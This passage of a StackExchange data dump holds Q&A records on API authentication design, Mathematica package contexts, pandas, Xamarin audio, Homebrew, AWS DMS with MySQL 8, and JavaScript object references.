Step 4 would still always call my specific front-end app which holds all the user tables.\nIs this a dumb way to do this?\nComment: It does smell of re-inventing the square wheel. What's wrong with sessions and SSL?\nComment: The API is sessionless. Amazon has a pretty good writeup on the auth protocol. I guess I am not really asking about the signature process as much as I am the security of steps 3-5. This comes from me separating the API database from the user database.\nAnswer: Who are you trying to protect? the user? the front-end web? or the API?\nI see one problem in that the API secret is stored on the front-end, which is more likely to be exposed to the outside world. If the front-end is compromised, then anybody can access the backend impersonating the user. It is a likely point to intercept in order to gain access to those secrets, otherwise only known to two parties.\nI'm not sure I understood the point of the user providing the api secret, or whether it was stored on the front-end, and the access was granted by e.g. a username\/password.\nOtherwise, it sounds like you can benefit from using OAUTH to sign requests. OAUTH has a (oddly not very known it seems) two-legged mode, where you can easily exchange signed messages between two entities with a shared key.\nAll and all, looks like either a bit of a confused\/confusing design, or perhaps it's hard to explain without giving more context. Best advice is to try not to reinvent the wheel and use existing algorithms\/solutions\/architectures as much as possible.\nComment: Thanks. I am going with OAuth. I originally passed over it because I thought it needed the webpage callback (three-legged).\nComment: yep, it's easy to miss since it's primarily used in the 3-legged situation by giants like google and twitter. One more tip about OAUTH and APIs - POST\/PUT requests might not be fully 'covered' by oauth, unless you use application\/x-www-form-urlencoded. Typically an API would use application\/json or xml, so pay attention to this. Usually adding SSL is a simple and effective solution with the 2-legged option, but just be aware of it!\n","meta":{"source":"security.stackexchange","title":"DRY API Authentication Design Between Services","dup_signals":{}},"subset":"stackexchange"} +{"text":"List conversion into list containing rules\n\nQuestion: How can I convert the two lists:\n<code>list1 = {1, 2, 3};\nlist2 = {\"One\", \"Two\", \"Three\"};\n<\/code>\ninto a list:\n<code>{1 -> \"One\", 2 -> \"Two\", 3 -> \"Three\"}\n<\/code>\nComment: `Thread[list1 -> list2]`\nAnswer: <code>MapThread[Rule,{list1 ,list2}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"List conversion into list containing rules","dup_signals":{}},"subset":"stackexchange"} +{"text":"Separate certificates on a local machine for each service\n\nQuestion: I'd like to know if it's possible to have a separate certificate on a local machine, one for a heavy client and the another one for the web browser to be sure the correct client communicate with the web browser. Thanks a lot for your help.\nComment: It's possible, but it wouldn't ensure that the correct client is using the correct certificate. Nor does it ensure that your client is being used to begin with. All a certificate does is prove possession of the private key.\nAnswer: Yes, it is.\nA certificate is simply a file, and so is the corresponding private key. 
You can place multiple certificates with their private keys on a machine and point each software to a different certificate.\n","meta":{"source":"security.stackexchange","title":"Separate certificates on a local machine for each service","dup_signals":{}},"subset":"stackexchange"} +{"text":"Redefining functions defined in standard libc header files?\n\nQuestion: Is there any <code>gcc<\/code> trick that lets me redefine the signature of <code>libc<\/code> functions (e.g. <code>fsetpos<\/code>) defined in standard headers (e.g. <code>stdio.h<\/code>)? As of now if I do that, I receive duplicate declaration error message.\nComment: Tell us why, so we understand why just declaring and defining e.g. `my_fsetpos` won't do?\nAnswer: Declarations in standard headers are decorated with many additional attributes to help optimizations, improve portability, etc. (and sometimes even defined as macros). If your declaration is even slightly incompatible to those you are guaranteed to get many interesting messages from compiler.\nSo if you try to overload some standard function, do not include standard headers in its file.\n","meta":{"source":"stackoverflow","title":"Redefining functions defined in standard libc header files?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Resources raw folder localize in xamarin.forms\n\nQuestion: I'm Xamarin Developer\nI want to play *.mp3 or *.wav file in the localized application\nso I divided the file like that\n\nand I implement code in dependency service like\n<code> public void OnePlaySound()\n {\n _mediaPlayer = MediaPlayer.Create(context, Resource.Raw.wavone);\n\n _mediaPlayer.Start();\n _mediaPlayer.Completion += delegate\n {\n if (_mediaPlayer != null)\n {\n _mediaPlayer.Stop();\n _mediaPlayer.Release();\n _mediaPlayer = null;\n }\n };\n }\n<\/code>\nbut _mediaPlayer always returns null..\nis there any solution to use the localizing raw files?\nAnswer: I understand from your description that you want to use MediaPlayer to play an audio file in the Resource\/Raw folder using dependencyservice in Xamarin.Forms. 
Here is an example:\nFirst, create interface named IPlayAudio in .Net standard library project(shared code).\n<code>public interface IPlayAudio\n{\n void playaudio();\n}\n<\/code>\nThen create one class that implements IPlayAudio in the Android platform, the platform implementations must be registered with the DependencyService, so that Xamarin.Forms can locate them at runtime.\n<code>[assembly: Dependency(typeof(PlayAudiomethod))]\nnamespace playvideo.Droid\n{ \npublic class PlayAudiomethod : IPlayAudio\n{\n private MediaPlayer _player;\n public void playaudio()\n {\n _player = MediaPlayer.Create(MainActivity.mac, Resource.Raw.MyAudio);\n _player.Start();\n }\n}\n}\n<\/code>\nFor MainActivity.mac, please create static member called \"mac\" in MainActivity and set it after the call to LoadApplication.\n<code>public class MainActivity : global::Xamarin.Forms.Platform.Android.FormsAppCompatActivity\n{\n public static MainActivity mac;\n protected override void OnCreate(Bundle savedInstanceState)\n {\n TabLayoutResource = Resource.Layout.Tabbar;\n ToolbarResource = Resource.Layout.Toolbar;\n\n base.OnCreate(savedInstanceState);\n\n Xamarin.Essentials.Platform.Init(this, savedInstanceState);\n global::Xamarin.Forms.Forms.Init(this, savedInstanceState); \n LoadApplication(new App());\n mac = this;\n\n \n }\n \n}\n<\/code>\nNow you can play audio from the Xamarin.Forms shared code.\n<code> private void mediaplayer_Clicked(object sender, EventArgs e)\n {\n DependencyService.Get<IPlayAudio>().playaudio();\n }\n<\/code>\nNote: please set xxx.mp3 Build Action as AndroidResource.\nComment: Thank you for your sincere answer. is it possible to find a localized raw folder automatically? I played an audio file when just one raw folder, but I have to divide the folder for localizing. then I tried the media player doesn't work....\nComment: @cocoadrinker About localized audio file on Android, you can try to take a look https:\/\/learn.microsoft.com\/en-us\/xamarin\/xamarin-forms\/app-fundamentals\/localization\/text?pivots=windows#localize-images-on-android\n","meta":{"source":"stackoverflow","title":"Resources raw folder localize in xamarin.forms","dup_signals":{}},"subset":"stackexchange"} +{"text":"pandas.concat ignores keys when ignore_index=True, is this a bug?\n\nQuestion: When I do <code>pd.concat((df1, df2), keys=('A', 'B'), ignore_index=True)<\/code> it ignores the keys. 
I couldn't find any mention of this in the documentation, am I missing something or is this a bug?.\ncode example:\n<code>import pandas as pd\nimport numpy as np\n\ndf1 = pd.DataFrame(np.random.uniform(0, 1, (5, 5)))\ndf2 = pd.DataFrame(np.random.uniform(0, 1, (5, 5)))\n\nprint(pd.concat((df1, df2), keys=('A', 'B')))\nprint(pd.concat((df1, df2), keys=('A', 'B'), ignore_index=True))\n<\/code>\noutput:\n<code> 0 1 2 3 4\nA 0 0.548398 0.285250 0.690403 0.646567 0.881671\n 1 0.560004 0.111783 0.155743 0.587277 0.485484\n 2 0.258623 0.243698 0.881638 0.686399 0.229254\n 3 0.492586 0.324359 0.922460 0.744553 0.316212\n 4 0.131956 0.693708 0.620376 0.893369 0.371382\nB 0 0.633036 0.402043 0.609046 0.212024 0.988794\n 1 0.383615 0.575692 0.320391 0.391028 0.589542\n 2 0.326453 0.879162 0.916395 0.525230 0.532779\n 3 0.273823 0.229596 0.326523 0.989329 0.340129\n 4 0.152274 0.445670 0.133162 0.112688 0.572573\n 0 1 2 3 4\n0 0.548398 0.285250 0.690403 0.646567 0.881671\n1 0.560004 0.111783 0.155743 0.587277 0.485484\n2 0.258623 0.243698 0.881638 0.686399 0.229254\n3 0.492586 0.324359 0.922460 0.744553 0.316212\n4 0.131956 0.693708 0.620376 0.893369 0.371382\n5 0.633036 0.402043 0.609046 0.212024 0.988794\n6 0.383615 0.575692 0.320391 0.391028 0.589542\n7 0.326453 0.879162 0.916395 0.525230 0.532779\n8 0.273823 0.229596 0.326523 0.989329 0.340129\n9 0.152274 0.445670 0.133162 0.112688 0.572573\n<\/code>\nEDIT:\npython version = 3.9.0.final.0\npandas version = 1.2.3\nEDIT:\nTo be clear what I was expecting is:\n<code> 0 1 2 3 4\nA 0 0.548398 0.285250 0.690403 0.646567 0.881671\n 1 0.560004 0.111783 0.155743 0.587277 0.485484\n 2 0.258623 0.243698 0.881638 0.686399 0.229254\n 3 0.492586 0.324359 0.922460 0.744553 0.316212\n 4 0.131956 0.693708 0.620376 0.893369 0.371382\nB 5 0.633036 0.402043 0.609046 0.212024 0.988794\n 6 0.383615 0.575692 0.320391 0.391028 0.589542\n 7 0.326453 0.879162 0.916395 0.525230 0.532779\n 8 0.273823 0.229596 0.326523 0.989329 0.340129\n 9 0.152274 0.445670 0.133162 0.112688 0.572573\n<\/code>\nComment: What output were you expecting?\nComment: @HenryEcker I was expecting to get the same as when I have ignore_index=False except that level 1 of the resulting multiindex should have new consecutive numbers from 0 to n.\nComment: The keys are your index. You're passing an argument to ignore the index. That's exactly the output I would expect.\nComment: @Abstract keys are a new level of the new index, I was expecting the old index to be ignored not the new index.\nComment: it can help : https:\/\/stackoverflow.com\/questions\/49620538\/what-are-the-levels-keys-and-names-arguments-for-in-pandas-concat-functio\nAnswer: You might need to add a reset_index() after concatenatinng\n<code>print(pd.concat((df1, df2), keys=('A', 'B'), ignore_index=False).reset_index(drop=True, inplace=True))\n<\/code>\nComment: Please explain your answer a bit and let OP know how this is going to help OP, and if possible please add the sample output as well.\nComment: Thank you for your answer but I already knew that I could do this I just didn't think that it would be necessary as I thought that just specifying keys and `ignore_index=True\u00b4 should do the job. 
My question was not \"how do I achieve my desired result\" but rather \"why doesn't pandas do as I was expecting\" and \"is it a bug or the intended behavior\".\n","meta":{"source":"stackoverflow","title":"pandas.concat ignores keys when ignore_index=True, is this a bug?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Homebrew OSX 10.9.3: \/usr\/local\/Library\/brew.rb:37:in `': uninitialized constant OS (NameError)\n\nQuestion: I think I have a borked installation of Homebrew. Whenever I type any of the brew commands, I get an uninitialized constant OS error.\n<code>MacBook-Pro-2:~ aramu$ brew update\n\/usr\/local\/Library\/brew.rb:37:in `<main>': uninitialized constant OS (NameError)\nMacBook-Pro-2:~ aramu$ brew doctor\n\/usr\/local\/Library\/brew.rb:37:in `<main>': uninitialized constant OS (NameError)\nMacBook-Pro-2:~ aramu$ brew --config\n\/usr\/local\/Library\/brew.rb:37:in `<main>': uninitialized constant OS (NameError)\n<\/code>\nI looked through the solution for a similar question (OSX Homebrew error: uninitialized constant MACOS) which suggested that my user be the owner of \/usr\/local\/ and everything within. It still doesn't work for me. \nNote: The machine had been previously used and on receiving it, I have created a new user for me with admin privileges. \nThe following is how the permissions are set for that folder now:\n<code>MacBook-Pro-2:~ aramu$ ls -lrth \/usr\/local\/\ntotal 80\ndrwxrwxr-x 5 aramu admin 170B Oct 22 2013 libexec\ndrwxrwxr-x 4 aramu admin 136B Jan 28 14:20 var\ndrwxrwxr-x 10 aramu admin 340B Jan 28 14:20 share\ndrwxr-xr-x 5 aramu admin 170B Jan 28 14:20 opt\ndrwxr-xr-x 5 aramu admin 170B Jan 28 14:20 man\ndrwxrwxr-x 24 aramu admin 816B Jan 28 14:20 lib\ndrwxrwxr-x 29 aramu admin 986B Jan 28 14:20 include\ndrwxrwxr-x 4 aramu admin 136B Jan 28 14:20 etc\n-rw-r--r-- 1 aramu admin 23K Jun 4 16:14 SUPPORTERS.md\n-rw-r--r-- 1 aramu admin 1.8K Jun 4 16:14 README.md\n-rw-r--r-- 1 aramu admin 1.2K Jun 4 16:14 LICENSE.txt\n-rw-r--r-- 1 aramu admin 687B Jun 4 16:14 CONTRIBUTING.md\n-rw-r--r-- 1 aramu admin 3.1K Jun 4 16:14 CODEOFCONDUCT.md\ndrwxrwxr-x 31 aramu admin 1.0K Jul 10 14:16 bin\ndrwxrwxr-x 9 aramu admin 306B Jul 10 14:22 Library\nMacBook-Pro-2:~ aramu$\n<\/code>\nAnswer: The solution I found for solving this was to completely uninstall Homebrew from the system and start from scratch. \nI used the code provided in this Github Gist to uninstall homebrew.\n","meta":{"source":"stackoverflow","title":"Homebrew OSX 10.9.3: \/usr\/local\/Library\/brew.rb:37:in `': uninitialized constant OS (NameError)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Finding the max value for a hierarchy level over another level\n\nQuestion: Let's say I have a DataFrame like this:\n<code>l1 1 2 \nl2 1 13 99 89\n0 1 2 2 1\n<\/code>\nand for each value of <code>l1<\/code>, I want to find the corresponding max value amongst the <code>l2<\/code> values under that <code>l1<\/code> value. 
Is there an easy way to do this using groupby?\nso in the above example it would be <code>1->2<\/code> and <code>2->99<\/code>\nMy current solution is along the lines of:\n<code>grouped = swapped.groupby(level=\"l1\",axis=1)\nmaxes = []\nfor n,g in grouped:\n maxes.append((n, max([x[1] for x in g.columns]))) # we take max over level l2 \n<\/code>\nAnswer: <code>In [33]: df = DataFrame([[1,2,2,1]],\n columns=MultiIndex.from_tuples([(1,1),(1,13),(2,99),(2,89)],names=['l1','l2']))\n\nIn [34]: df\nOut[34]: \nl1 1 2 \nl2 1 13 99 89\n0 1 2 2 1\n\nIn [35]: df.T.reset_index().groupby('l1').max()\nOut[35]: \n l2 0\nl1 \n1 13 2\n2 99 2\n<\/code>\n","meta":{"source":"stackoverflow","title":"Finding the max value for a hierarchy level over another level","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to find the package file that stores a certain symbol?\n\nQuestion: Is it possible to figure out in what file a certain packaged symbol lives in (assuming there is no shadowing between multiple identical symbol names)? I would like to have a function that if, given a context or a symbol from a context, opens up the relevant package file.\nWith <code>Needs<\/code> Mathematica automatically loads all symbols in each package file of the given context if directories are set correctly with <code>$Path<\/code>. It seems though that I cannot access the information from which file Mathematica pulls each symbol. It is an overkill to scan through all directories in <code>$Path<\/code> and through all files in each directory to find the given symbol. Is there an easier method?\nComment: I'm pretty sure that this information is not stored: to load a package, *Mathematica* just opens a stream and reads from it as if it were any other sort of input. Still, good question, +1.\nComment: @Mr.Wizard If a given context (via `Needs`) pulls symbols from different files (as e.g. mentioned in [this](http:\/\/mathematica.stackexchange.com\/a\/22407\/89) case), than it is not a matter of convention but a matter of taste in which file the symbol is actually stored.\nComment: In old versions, this would have been a bit easier to do: one just scans the `init.m` file associated with each package group (e.g. ``Algebra` ``, ``NumericalMath` ``, ...) and looks at the `DeclarePackage[]` lines for the appropriate functions. The new way things are arranged now makes things slightly hairier.\nComment: If you follow the convention of having the context match the file name of the package wouldn't this be almost trivial? Do you have a reason *not* to follow that convention?\nAnswer: My previous answer had heavy shortcomings and errors, so I took a deeper breath and figured out a more robust way.\nThe problem with <code>FindFile[\"context`\"]<\/code> is twofold. First, it can only return the first file in a possibly long list of files adding to the same context. Second, it might not work on a context extracted from a symbol because symbol contexts might not be identical to the package name. The package specification in Mathematica is confusing: <code>myPackage`<\/code> means two different things:\n\nFILENAME: If <code>Get[\"myPackage`\"]<\/code> (or <code>Needs<\/code>) is called, Mathematica will interpret <code>myPackage<\/code> as a file path using <code>FindFile<\/code> to figure out the source.\nCONTEXT: In <code>BeginPackage[\"myPackage`\"]<\/code> (or <code>Begin<\/code>) and in <code>myPackage`symbol<\/code>, <code>mypackage<\/code> is interpreted as a namespace within the memory, and has nothing to do with files. 
<code>$Packages<\/code> and <code>$ContextPath<\/code> only store these contexts but not package-file-path-specifiers of point 1.\n\nThere is no guarantee, that the package name agrees with the context name. Though this is the convention, a package defined at path <code>...\/myPackage<\/code> might not contain the line <code>BeginPackage[\"myPackage`\"]<\/code> in it. One can easily create artificial cases where a package file at <code>...\/package.m<\/code> (called as <code>Get[\"package`\"]<\/code>) loads symbols like <code>context`sym<\/code>.\nTo be clear, any package you design should have at least one file in it which has the same name as the context it generates. If context and file name do not match, either the file is not found (if context is called by <code>Needs<\/code>, resulting in <code>Get::noopen<\/code> error) or context is not created (if filename is called by <code>Needs<\/code>, resulting in <code>Needs::nocont<\/code> error). Note however, that in the latter case, the file is nevertheless loaded, regardless of the expected context. The reason I say \"at least one file\" above is because this file then can call any other package file in the same directory (obviously with different file names) or from other directories.\nSo a foolproof solution to find all package files could only work if it knows the associations between filenames and contexts. To have that, package calls have to be monitored and the collected data stored. In another answer I presented <code>safeGet<\/code> that can read a package, collect all the files that are touched by successive package calls from within and at the end removes all contexts and symbols introduced during all the calls. With <code>safeGet<\/code> it becomes possible to capture the necessary data to identify sources. <code>safeGetSource<\/code> is a light version of <code>safeGet<\/code> that only captures context -> file associations but not all files (like <code>init.m<\/code>-s that don't contain context-creating code).\n<code>contextJoin[s:{__String}] := StringReplace[StringJoin[#<>\"`\"& \/@s], \"`\".. 
-> \"`\"]\npackageButton[file_String] := Button[FileNameTake@file, NotebookOpen@file, \n Appearance -> \"Palette\"];\n\nsafeGetSource[pkg_String, arg___] := Module[{\n bp, ep, begin, end, contexts = {}, assoc = {}, all, \n cStack = {$Context}, cpStack = {$ContextPath}},\n Block[{$Packages = $Packages, $ContextPath = $ContextPath, $Context = $Context},\n Off[General::shdw];\n bp[ctx_] := bp[ctx, {}];\n bp[ctx_, needed_List] := (\n AppendTo[cStack, $Context];\n AppendTo[cpStack, $ContextPath];\n $ContextPath = DeleteDuplicates@Join[{ctx}, needed, {\"System`\"}];\n $Packages = DeleteDuplicates@Prepend[$Packages, ctx];\n $Context = ctx;\n assoc = Union[assoc, {$Context -> packageButton@$InputFileName}];\n contexts = Union[contexts, {$Context}];\n Needs \/@ needed;\n ctx);\n begin[ctx_] := (\n AppendTo[cStack, $Context];\n $Context = contextJoin@{$Context, ctx};\n assoc = Union[assoc, {$Context -> packageButton@$InputFileName}];\n contexts = Union[contexts, {$Context}];\n ctx);\n ep[] := ({$ContextPath, cpStack} = {Last@cpStack, Most@cpStack};\n {$Context, cStack} = {Last@cStack, Most@cStack};);\n end[] := ({$Context, cStack} = {Last@cStack, Most@cStack};);\n Block[{BeginPackage=bp, EndPackage=ep, Begin=begin, End=end}, Get[pkg, arg]];\n all = # <> \"*\" & \/@ contexts;\n Unprotect \/@ all;\n Quiet[Remove \/@ all];\n On[General::shdw];\n assoc\n ]];\n\nassoc = safeGetSource@\"OpenCLLink`\"\n<\/code>\n\n<code>{\n \"CCompilerDriver`\" -> \"CCompilerDriver.m\",\n \"CCompilerDriver`CCompilerDriverBase`\" -> \"CCompilerDriverBase.m\",\n \"CCompilerDriver`CCompilerDriverBase`Private`\" -> \"CCompilerDriverBase.m\",\n \"CCompilerDriver`CCompilerDriverRegistry`\" -> \"CCompilerDriverRegistry.m\",\n \"CCompilerDriver`CCompilerDriverRegistry`Private`\" -> \"CCompilerDriverRegistry.m\",\n \"CCompilerDriver`GenericCCompiler`\" -> \"GenericCCompiler.m\",\n \"CCompilerDriver`GenericCCompiler`Private`\" -> \"GenericCCompiler.m\",\n \"CCompilerDriver`IntelCompiler`\" -> \"IntelCompiler.m\",\n \"CCompilerDriver`IntelCompilerWindows`\" -> \"IntelCompilerWindows.m\",\n \"CCompilerDriver`IntelCompilerWindows`Private`\" -> \"IntelCompilerWindows.m\",\n \"CCompilerDriver`Private`\" -> \"CCompilerDriver.m\",\n \"CCompilerDriver`System`\" -> \"System.m\",\n \"CCompilerDriver`System`Private`\" -> \"System.m\",\n \"CCompilerDriver`VisualStudioCompiler`\" -> \"VisualStudioCompiler.m\",\n \"CCompilerDriver`VisualStudioCompiler`Private`\" -> \"VisualStudioCompiler.m\",\n \"CUDALink`\" -> \"CUDALink.m\",\n \"CUDALink`NVCCCompiler`\" -> \"NVCCCompiler.m\",\n \"CUDALink`NVCCCompiler`Private`\" -> \"NVCCCompiler.m\",\n \"CUDALink`Private`\" -> \"CUDALink.m\",\n \"GPUTools`\" -> \"GPUTools.m\",\n \"GPUTools`CodeGenerator`\" -> \"CodeGenerator.m\",\n \"GPUTools`CodeGenerator`Private`\" -> \"CodeGenerator.m\",\n \"GPUTools`Detection`\" -> \"Detection.m\",\n \"GPUTools`Detection`Private`\" -> \"Detection.m\",\n \"GPUTools`Private`\" -> \"GPUTools.m\",\n \"GPUTools`SymbolicGPU`\" -> \"SymbolicGPU.m\",\n \"GPUTools`SymbolicGPU`Private`\" -> \"SymbolicGPU.m\",\n \"GPUTools`Utilities`\" -> \"Utilities.m\",\n \"GPUTools`Utilities`Private`\" -> \"Utilities.m\",\n \"LibraryLink`\" -> \"LibraryLink.m\",\n \"LibraryLink`Private`\" -> \"LibraryLink.m\",\n \"OpenCLLink`\" -> \"OpenCLLink.m\",\n \"OpenCLLink`Private`\" -> \"OpenCLLink.m\",\n \"SymbolicC`\" -> \"SymbolicC.m\",\n \"SymbolicC`Private`\" -> \"SymbolicC.m\"\n}\n<\/code>\n\nQuerying a symbol can now be done as:\n<code> Context@symbol \/. 
assoc\n<\/code>\nExamining <code>\"PacletManager<\/code>\"`` reveals that the one public context calls quite a few files:\n<code> safeGetSource@\"PacletManager`\"\n<\/code>\n\n<code>{\n \"PacletManager`\" -> \"PacletManager.m\",\n \"PacletManager`Collection`Private`\" -> \"Collection.m\",\n \"PacletManager`Documentation`Private`\" -> \"Documentation.m\",\n \"PacletManager`Extension`Private`\" -> \"Extension.m\",\n \"PacletManager`LayoutDocsCollection`Private`\" -> \"LayoutDocsCollection.m\",\n \"PacletManager`Manager`Private`\" -> \"Manager.m\",\n \"PacletManager`MemoryCollection`Private`\" -> \"MemoryCollection.m\",\n \"PacletManager`Package`\" -> \"Collection.m\",\n \"PacletManager`Package`\" -> \"Documentation.m\",\n \"PacletManager`Package`\" -> \"Extension.m\",\n \"PacletManager`Package`\" -> \"LayoutDocsCollection.m\",\n \"PacletManager`Package`\" -> \"Manager.m\",\n \"PacletManager`Package`\" -> \"MemoryCollection.m\",\n \"PacletManager`Package`\" -> \"Packer.m\",\n \"PacletManager`Package`\" -> \"Paclet.m\",\n \"PacletManager`Package`\" -> \"PacletManager.m\",\n \"PacletManager`Package`\" -> \"Services.m\",\n \"PacletManager`Package`\" -> \"Utils.m\",\n \"PacletManager`Package`\" -> \"Zip.m\",\n \"PacletManager`Packer`Private`\" -> \"Packer.m\",\n \"PacletManager`Paclet`Private`\" -> \"Paclet.m\",\n \"PacletManager`Private`\" -> \"PacletManager.m\",\n \"PacletManager`Services`Private`\" -> \"Services.m\",\n \"PacletManager`Utils`Private`\" -> \"Utils.m\",\n \"PacletManager`Zip`Private`\" -> \"Zip.m\"\n}\n<\/code>\n\nLet's see a less complicated example, with a non-conventional package-context association (made for this purpose). Note, that while the package was called as <code>\"MyPackage`\"<\/code>, the context added to memory and captured by <code>safeGetSource<\/code> is <code>\"MyContext`\"<\/code>:\n<code> safeGetSource@\"MyPackage`\"\n<\/code>\n\n<code>{\n \"Functions`\" -> \"Functions.m\",\n \"Functions`Private`\" -> \"Functions.m\",\n \"MyContext`\" -> \"file.m\",\n \"Test`\" -> \"Common.m\",\n \"Test`\" -> \"TestA.m\",\n \"Test`\" -> \"TestB.m\",\n \"Test`Private`\" -> \"TestA.m\",\n \"Test`Private`\" -> \"TestB.m\"\n}\n<\/code>\n\nThe dependency tree of the above call, created by <code>safeGet<\/code>:\nComment: I'll admit that I didn't try to understand how it works, I just tried it on the package I wanted to do this with last time: ``safeGet[\"OpenCLLink`\"]``. Unfortunately it seems to go into an infinite recursion.\nComment: @Szabolcs Thanks for taking the time to test it! The previous code was crap, please check new version.\nComment: In `contextJoin` (first line in code box), `str` should be corrected to `s`, right?\nComment: @Szabolcs Sure, thanks, corrected. Made the line shorter to fit the page width but forgot to replace all vars.\nComment: Would you like to submit a patch to the spelunking package to add this (and related) functionality? (This would be a separate function, but part of the same package.)\nComment: @Szabolcs Thank you, I will gladly add to it! Just want to test it a bit further and see how people test it. Some bugs surely will surface...\nComment: @Szabolcs I might have considered your offer more seriously than necessary. In the last weeks I was busy to combine functionality of three domains: packages-and-contexts, symbols and definitions, as these are used all the time during development. I now have working code in all three. 
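One way to keep an eye on when a newer replication engine version becomes available is to list the orderable replication instances from the DMS API. A rough illustration with boto3 follows; it assumes your credentials and region are already configured, and the response field names are from memory, so double-check them against the boto3 docs.
<code>import boto3

dms = boto3.client('dms')
resp = dms.describe_orderable_replication_instances()
versions = sorted({item['EngineVersion'] for item in resp['OrderableReplicationInstances']})
print(versions)  # watch for a 3.4.x entry showing up here
<\/code>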
I would like to discuss it with you how it should be published, as I it nicely fits spelunking, but is more than what that package aims for. Would you have time to meet me in chat sometimes to revise the code and decide on how to introduce it to the community? I would really appreciate it.\nComment: Let's do it tomorrow some time after 18:30 Budapest time ... I'm teaching tomorrow so I need to prepare for that today. But you can consider a completely separate package as well. After all this functionality would be separate from spelunking (it would not depend on it) and the spelunking package can always load another one.\nComment: @Szabolcs Great, I'll be around in the afternoon!\nComment: @Szabolcs Here is the link for the room: [http:\/\/chat.stackexchange.com\/rooms\/13252\/discussion-between-szabolcs-and-istva\u200c\u200bn](http:\/\/chat.stackexchange.com\/rooms\/13252\/discussion-between-szabolcs-and-istva\u200c\u200bn)\nComment: Thanks for the explanation of the context and file name. However, I still have a problem about the doc of `Get`, which I'll quote here, \"If name is the name of a Wolfram Language _context_ , ending with a ` context mark character, then Get will process this name to find the file to read. \" My question is, in principle, the context's name can be different with the file name, in this case, there is no way to find the file. I think the right words are, the name before backtick can _only_ be file or directory name, even though it's meant to be context name. Did I understand this correctly?\nComment: @luyuwuli That is right. See my edit in the answer that intends to clarify this point.\nComment: Thanks for your response. Now, I finally figure this subtlety out.\nAnswer: Just a really quick hack that is nevertheless useful sometimes:\n<code>LocateFunction[f_]:=(SystemOpen[Context[f]];NotebookFind[SelectedNotebook[],f\/\/ToString])\n<\/code>\nIf applicable, this opens the package relating to the symbol\u00b4s context and primes the search (use F3 to search for subsequent locations of the symbol).\nComment: Actually, `SystemOpen` uses `FindFile` under the hood, so that might be more straightforward to use. My problem with this approach is that it can only point you to the first file loaded in the chain, but there is no way (without actually running `Get`) to know what other files are related. +1 nevertheless.\nComment: @Istv\u00e1nZachar you are absolutely correct. This is just something I cobbled together some time ago on the fly, but it has proven useful mainly for packages of my own doing.\n","meta":{"source":"mathematica.stackexchange","title":"How to find the package file that stores a certain symbol?","dup_signals":{}},"subset":"stackexchange"} +{"text":"MYSQL 8.0.19 (ON PREMISE) as source in AWS DMS?\n\nQuestion: Can someone please confirm if my on premise MYSQL 8.0.19 instance can be used as source in Aws Database migration service ,with target as aws redshift.\nThe articles I read show only MySQL versions 5.5, 5.6, and 5.7 as supported.\nhttps:\/\/docs.aws.amazon.com\/dms\/latest\/userguide\/CHAP_Source.html\nWondering if support is provided as of MAY 2020.\nPS: I ran into problem while setting task (AWS DMS FULL load) with mysql(on premise) 8.0.19 as source and redshift as target.\nThe task is set but the table load fails with table error.\nAnswer: AWS DMS frustratingly still doesn't support MySQL 8 as a source as far as I know. \nHere's a related support thread in the AWS Developer Forums:\nDMS task fails when migrating RDS MySQL 8 database . 
In that thread, an AWS staffer commented on January 28 that it should be supported with DMS version 3.4 (the current version is 3.3.2), however they haven't provided any details on when we can expect 3.4 to be available.\nComment: But one of my colleague was successfull in getting RDS mysql 8+ migrated using DMS.My On the other hand is onprem mysql and I am failing with DMS. Finally used aws datapipeline (I sync the table fully ,daily)\n","meta":{"source":"stackoverflow","title":"MYSQL 8.0.19 (ON PREMISE) as source in AWS DMS?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why javascript object value is changed?\n\nQuestion: Can anyone explain to me why the output value is changed to \"20, 2\" instead of the original \"1, 2\"?\n\n<code><!DOCTYPE html>\n<html>\n<body>\n <p id=\"demo\"><\/p>\n <p id=\"demo1\"><\/p>\n <script>\n var x = {\n a: 1,\n b: 2\n };\n var y = x;\n y.a = 20;\n document.getElementById(\"demo\").innerHTML = x.a;\n document.getElementById(\"demo1\").innerHTML = x.b;\n <\/script>\n<\/body>\n<\/html><\/code>\nComment: @Seblor I would argue that there's nothing wrong with using `var` in front end JS, in fact if you're aiming for a good range of browser support, we're still (unfortunately) on the border of having to avoid using let\/const at all.\nComment: JS passes objects by reference, there are some in depth questions relating to this: https:\/\/stackoverflow.com\/questions\/16880418\/javascript-pass-object-as-reference\nComment: Since you seem to be new to JavaScript, I highly suggest *not* using `var` as it is considered bad practice. You should use `let` or `const`.\nComment: @DBS While I understand what you mean, I really think the use of `var` and the browser support should be left to the transpilers (like Babel). If people keep using `var`, they will have a hard time changing later on. Also using the newer ECMAScript versions usually improves the code readability.\nAnswer: You are pointing <code>y<\/code> to the reference of <code>x<\/code> which itself is pointing to the object <code>{a:1,b:2}<\/code>.\nSo in memory it is:\n<code>x --> {a:1,b:2}\n<\/code>\nAfter you do <code>y = x<\/code>, it becomes:\n<code>y --> x --> {a:1,b:2}\n<\/code>\nOr to put it simply:\n<code>x --> {a:20,b:2}\n ^\n |\ny -------\n<\/code>\nNow when you do <code>y.a = 20<\/code>, since <code>y<\/code> and <code>x<\/code> are both pointing to the same object when properties of the object is changed through either of the references <code>x<\/code> or <code>y<\/code> the change will be reflected in both the references:\n<code>y --> {a:20,b:2}\n ^\n |\nx -------\n<\/code>\nThat is why you get <code>20,2<\/code> when you get <code>x.a<\/code>.\nAnswer: <code>var y=x\n<\/code>\nIn the above line <code>y<\/code> is passed the reference of <code>x<\/code> instead of the whole object x. Any changes made to the object will get reflected in all the variables containing the reference of the object. \nAnswer: Because its the same <code>reference<\/code> (same address for memory location where the object is stored) both x and y are now the same reference so changing one will change the value stored, and now as they are the same reference they will output the same object values.\nI would add something extra to make this answer more productive.\n\nShallow -Copy\nShallow copy is a bit-wise copy of an object. A new object is created\n that has an exact copy of the values in the original object. 
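This behaviour is not specific to JavaScript; most languages that treat objects as references work the same way. For comparison only, here is the identical situation sketched in Python:
<code>import copy

x = {'a': 1, 'b': 2}
y = x                  # y is another name for the same dict, not a copy
y['a'] = 20
print(x['a'])          # prints 20: the change is visible through x as well

z = copy.deepcopy(x)   # an independent copy
z['a'] = 1
print(x['a'])          # still 20, z no longer shares storage with x
<\/code>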
